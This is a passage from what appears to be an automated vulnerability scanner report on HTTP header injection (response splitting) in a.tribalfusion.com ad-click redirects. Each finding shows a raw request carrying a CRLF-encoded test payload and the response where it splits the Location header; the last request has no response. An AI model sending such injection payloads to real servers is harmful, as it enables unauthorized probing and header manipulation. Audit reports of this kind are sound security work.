Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a276f%0d%0a361444f8735 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/a276f%0d%0a361444f8735/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aonEV8q0I1pDyNylQvm1Tr1GjUUR7dZaATZaSiKqNI8GVYjLZdUUa4sZbk3TqOMru17W82ZbJauWs5ARJKWyAPTpGrkurVMZdEdkEIGHp9Zcf4vICcLp7Noa7KZbNPiHdk7xHZdWZaUuCuYmAgc3Q93VooUuKOmddKuwSMGVS9ZcrGvVfSRvnrEZaSvwPM6g6byE0FYkryUst3TpxnABruqFkVSBgwMXBhZbsPoRZb4Zb1lKxZbZcRJZdNdXKHwarm9bb183lslT6ZdFWHods6INBNY6ag4M6Zcxf3oXLm4Q5UpdrHSeNbba6ZbU8dv5H1w2rsUxQWgOJh0ZcCZaB2kapmhmDXKuDO25my5SFpWnbZdPhUSZceKwuHNZdBObVWtylXhquOsvFrr20uP5Zc9SUNEtPnWZbfx4xdCQFe2P0BCAvhn65eG6mxmU0AgaMvVtC6GOGtUUORNS6FXsIhtZbZbQoQH0erpwR0eXXlym1bkkDF7VtNsMATaXTZdY9t6L0xsbZce79tTGmr6h53VBZdxs5Sv0avFReaRRZd4BID38MG4hfptHSyJc2jAV0lZbEdgrO7Ga7gRJ8OQIlhrUVedkRAG; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:45 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/a276f
361444f8735/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 83f7f%0d%0a20b0303aa8 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/83f7f%0d%0a20b0303aa8/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aNnEV8yg6AOUA7ujQFNyvZdqnyZd0R3qZd7qY33CYXJDV1ff6FEMS5bvSWWUbuQPP8akkJeXjYFRwUI5WuSuWrEQqrcdElVheZcxZdXuRZcvQw3rI2ZcYT7TkCMKqbaxZac4WhOZdvvEKBVZb0Zc64BZb8X9mNIZdZaTh1yU040bMoN2cu45S9faOWalW4Xk7uyWWscbQjFFuBk8wr9ZbDpvrnHKjWP5Ru4B2ZbWZaeW4oLTZaN9AIKikkxWGqoFoCH4fiwnfRlsj5JOZcPOAlZdhDsfIOcIBOKvf7yOcKncZcZdydJTPJ4mhUe6p9GfRt5QVa48wC9WngKALcaK53eBqKZaVVvrvu3KQuZaxGrUUOCD0ip2aZamLZc7EmOrYT8LBZdVZaRiGsZbFBuS1ZaMJGDnVH1QtbUZdskS0ZbpU2sBOHAmFXMn1HZdDiI4EgfKbrZdVGRrZaikLxntBOBytpEqLOZcMe5c4bGphGQeaU3jXL5q1GGD77t5gdFHI41ijxwcSO0cvBaRhVSqTZci2HnPbZdYxZd5QSG7p3lnP0Os0EU7MvE4WdT0MyLXySjyFYZcjQf1MRHHFnd8ZbJZaT6Y1c7hi1dIpI; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/83f7f
20b0303aa8/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 9 is copied into the Location response header. The payload 90f5c%0d%0a969ec85c814 was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/90f5c%0d%0a969ec85c814/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annEV8oZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlN5neGdydMBFHQpGefVxuZaMkal3YBuBBujHnmccCxp6NSXVUkrTBwroZaoAC5WTKTtRqfpwZd1GsMZc1ie9mLZaASXjiXQ9ww4lTxHr2DRlp35n7Xh10B8ZdS3Ug5lOsKQZbOmhUv0VweoZbagiS9VgTrvGxMxSC8Y32oWZb7nJuv61dGRI8W6glgrjV4UK7I2GcPGduXduN3r2Ww5MKV7C7H95emMy1Yyyk2F5Pj8E8YhR6Ha6eYZdUXwAZdJXoY86S9sWsyhgZc8nQnHSnjWh0Hjr0JZaeT0DLGoM1oFst9GxGMLmnTvUl05bqixBpZcQnTHUPHHuqlnsrUKx5hdX; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:19 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/90f5c
969ec85c814/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr request parameter is copied into the Location response header. The payload 2b368%0d%0ae152459b88d was submitted in the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=2b368%0d%0ae152459b88d HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aEnEV8RZdySO6IUMNYGxOjh1oBlrc7bJ8Za02ysiOlWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57hx8oxxAiGZdrQEXCZaR7FrYnMtHwupjfTDQiGiqm8iEycb5nvPObadwxjWHKmTpbGD3MJ7s6Zd4rA8o6BM3NWGePpwOROZaRat3FViRXSZdw7Ju8OZaZbGwDFkSxPxFhZc0gbVNu9ZaBdDPpPjIZckXZaTicMJLZdg78vyok4bplSSrFVKcpgq2UTFRKn7xYnEosopPG1whE9pWflxWZbX9FMQ9rjZa4gWXncMcw4jotJ8eBMjJmqyqPPVZaEfn5tcO3UuTfbMeFUy4pHoWRl4g0tQOd4RX5UjtOJNXeVJfUE6BpXSOuUYfppBGJeSS6a73PgS314olYDVwgMuo2rQjbgb2fOdnfZdyCPg5VTYxCc3ruYPS035xqc8paOIaBGFoIdGOr12CEqCq4XeEfX0Pg19WE4BJoVduG910OOZdLkCmGayerVdTnRFWt8Wp7ySUUBQHIZdVWQ0Q0rYf5; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:57 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=2b368
e152459b88d
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b66f4%0d%0af5f710e997 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?b66f4%0d%0af5f710e997=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aVnEV8pyXanFqiV3EGmyfa3pJS2dFZcKpjZc14Cv0wOd5ZcbF6Vfr0FnMSsZa7mneZbgTGSeea6ScVQPw0s0TmwSTUQYaksCrRsLuWUxrRmnJZbMZcgkEO6JEZai8kZaUhy84LTpkyKBlfZdILg8YPJIv7qmDjARaO20YyZcTxDRZbC2ZdjTGnbwmaMxJyPKf2jTVS4SJJMwApsnSScb67SxQcF1Q5YtjFM7cfZc3O0kT3GCG2gMjyZdEHdHBnopHbZbcV7tgNBZcyUZcn0mdX8svOm1eXroaJy8oOs7XaxSwRQkU1HdjVeAnPwXVPSqpsKEO8eY4J4G9dxLAgS1mnQlQmbRD5kyYbs8KfwLVrQb8FQXED7SwsajiGYA2Gs3RSXnlUFZaiTIDw81n0w8Za3WZb7hZbwsTa7K5Yt5iBnI2ReXxI1HtcfIrSeZcC51cbn7HQXC0VM4VNmDdaJukPUjF7vTIi4xOiJ2l1IwmnLoj9ZaBpRD1i0ZbHWfGxc4vjOCd10jattU5Num96Xwgv1UxvKQpx2OojFXCEOIuHOqZaZd7EnZcXUfQMaFPGCrDtocJkqaMiiMmMUGfFkSF73n; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:59 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?b66f4
f5f710e997=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8d45c%0d%0a20e1c69dbef was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/?8d45c%0d%0a20e1c69dbef=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aYnD41yKafgmX5v7JubfKCXOgDKufZcJZdDUmUnpxYQ6oWIKwZcO6abTZcobGRn4t1uFHvB0aXxjjLa5dyi3ji073EANr5Sw5Q3ZbgQ0LKFkgXTwhsYfZc4JptanrJ4vZboG3EgW1d3YZcxaiLmerpjAvtVrjuLJ6qGbZdFmvZaAS3wByIT5kwlTmNPf7ZceC1mjZaXAClbGv6sMRn76p8kgVSBIVKmP2ExmNoiWewdHZaS2AeR959m8HCZaHDZaCKvDs7bVw7goOhhG9DJwIfJcyIrwuCAqWqi9gxo07l8Ki8Dvnhv34NoV1Pbw4ZabVoaZbaRfupIVJ4q8qbZaMiDkLsbLsZaAxuOUw0xRAFFypll8RwfFROXcWV5T9iZcJSbfGkjH5RaWZb4ZdFNmS4DOZblOYc9yVAAa5x83uhXrpCV3lQ4ZdRsG5MwhPiVVX5PG6KmJWOZantuhPnp7j0362YOgZdpKY696fcYXNLklpBYrRJ2iyc1H1ZcUpahRfUyQZagoenv3AmZaUpKHZbdjQdJl0ZcRYZd16sU0BHsalhBZb2c3THDxB0ZaJ5nx1ZawtLE8BWiPmg5NNMi; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:13 GMT;
Content-Type: text/html
Location: ?8d45c
20e1c69dbef=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload ac0a8%0d%0a8ed1987295d was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=ac0a8%0d%0a8ed1987295d HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
